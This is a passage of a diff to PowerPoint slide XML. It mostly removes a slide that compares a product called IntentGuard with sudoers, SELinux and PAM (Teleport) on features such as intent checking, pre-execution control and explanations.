+        <a:solidFill>
+          <a:schemeClr val="bg1"/>
+        </a:solidFill>
+        <a:effectLst/>
+      </p:bgPr>
+    </p:bg>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
           <p:cNvPr id="26" name="Rectangle 25">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
@@ -4237,1629 +4493,6 @@
           </a:prstGeom>
         </p:spPr>
       </p:pic>
-    </p:spTree>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide14.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:bg>
-      <p:bgPr>
-        <a:solidFill>
-          <a:srgbClr val="141428"/>
-        </a:solidFill>
-        <a:effectLst/>
-      </p:bgPr>
-    </p:bg>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="2" name="TextBox 1"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="548640" y="274320"/>
-            <a:ext cx="7772400" cy="640080"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="2600" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="F8F8F8"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>IntentGuard vs. ALTERNATIVES</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="Rectangle 2"/>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="548640" y="868680"/>
-            <a:ext cx="1828800" cy="38100"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:solidFill>
-            <a:srgbClr val="00D4AA"/>
-          </a:solidFill>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-        <p:style>
-          <a:lnRef idx="1">
-            <a:schemeClr val="accent1"/>
-          </a:lnRef>
-          <a:fillRef idx="3">
-            <a:schemeClr val="accent1"/>
-          </a:fillRef>
-          <a:effectRef idx="2">
-            <a:schemeClr val="accent1"/>
-          </a:effectRef>
-          <a:fontRef idx="minor">
-            <a:schemeClr val="lt1"/>
-          </a:fontRef>
-        </p:style>
-        <p:txBody>
-          <a:bodyPr rtlCol="0" anchor="ctr"/>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="ctr"/>
-            <a:endParaRPr/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="4" name="TextBox 3"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="548640" y="1097280"/>
-            <a:ext cx="1645920" cy="274320"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1000" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="00D4AA"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:endParaRPr/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="5" name="TextBox 4"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="2194560" y="1097280"/>
-            <a:ext cx="822960" cy="274320"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1000" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="00D4AA"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>Intent</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="6" name="TextBox 5"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="3017520" y="1097280"/>
-            <a:ext cx="1005840" cy="274320"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1000" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="00D4AA"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>Pre-Exec</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="7" name="TextBox 6"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="4023360" y="1097280"/>
-            <a:ext cx="1005840" cy="274320"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1000" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="00D4AA"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>Learning</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="8" name="TextBox 7"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="5029200" y="1097280"/>
-            <a:ext cx="1371600" cy="274320"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1000" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="00D4AA"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>Explain</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="9" name="TextBox 8"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="6400800" y="1097280"/>
-            <a:ext cx="822960" cy="274320"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1000" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="00D4AA"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>Agent</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="10" name="TextBox 9"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="548640" y="1463040"/>
-            <a:ext cx="1645920" cy="256032"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1000" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="22C55E"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>IntentGuard</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="11" name="TextBox 10"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="2194560" y="1463040"/>
-            <a:ext cx="822960" cy="256032"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1000" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="22C55E"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>✅</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="12" name="TextBox 11"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="3017520" y="1463040"/>
-            <a:ext cx="1005840" cy="256032"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1000" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="22C55E"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>✅</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="13" name="TextBox 12"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="4023360" y="1463040"/>
-            <a:ext cx="1005840" cy="256032"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1000" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="22C55E"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>✅</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="14" name="TextBox 13"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="5029200" y="1463040"/>
-            <a:ext cx="1371600" cy="256032"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1000" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="B0B0C0"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>✅ 11 langs</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="15" name="TextBox 14"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="6400800" y="1463040"/>
-            <a:ext cx="822960" cy="256032"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1000" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="22C55E"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>✅</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="16" name="TextBox 15"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="548640" y="1828800"/>
-            <a:ext cx="1645920" cy="256032"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1000" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="F8F8F8"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>sudoers</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="17" name="TextBox 16"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="2194560" y="1828800"/>
-            <a:ext cx="822960" cy="256032"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1000" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF4444"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>❌</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="18" name="TextBox 17"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="3017520" y="1828800"/>
-            <a:ext cx="1005840" cy="256032"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1000" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="22C55E"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>✅</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="19" name="TextBox 18"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="4023360" y="1828800"/>
-            <a:ext cx="1005840" cy="256032"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1000" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF4444"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>❌</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="20" name="TextBox 19"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="5029200" y="1828800"/>
-            <a:ext cx="1371600" cy="256032"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1000" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF4444"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>❌</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="21" name="TextBox 20"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="6400800" y="1828800"/>
-            <a:ext cx="822960" cy="256032"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1000" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF4444"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>❌</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="22" name="TextBox 21"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="548640" y="2194560"/>
-            <a:ext cx="1645920" cy="256032"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1000" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="F8F8F8"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>SELinux</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="23" name="TextBox 22"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="2194560" y="2194560"/>
-            <a:ext cx="822960" cy="256032"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1000" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF4444"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>❌</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="24" name="TextBox 23"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="3017520" y="2194560"/>
-            <a:ext cx="1005840" cy="256032"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1000" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="22C55E"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>✅</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="25" name="TextBox 24"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="4023360" y="2194560"/>
-            <a:ext cx="1005840" cy="256032"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1000" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF4444"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>❌</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="26" name="TextBox 25"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="5029200" y="2194560"/>
-            <a:ext cx="1371600" cy="256032"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1000" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF4444"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>❌</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="27" name="TextBox 26"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="6400800" y="2194560"/>
-            <a:ext cx="822960" cy="256032"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1000" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF4444"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>❌</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="28" name="TextBox 27"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="548640" y="2560320"/>
-            <a:ext cx="1645920" cy="256032"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1000" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="F8F8F8"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>PAM (Teleport)</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="29" name="TextBox 28"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="2194560" y="2560320"/>
-            <a:ext cx="822960" cy="256032"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1000" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF4444"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>❌</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="30" name="TextBox 29"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="3017520" y="2560320"/>
-            <a:ext cx="1005840" cy="256032"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
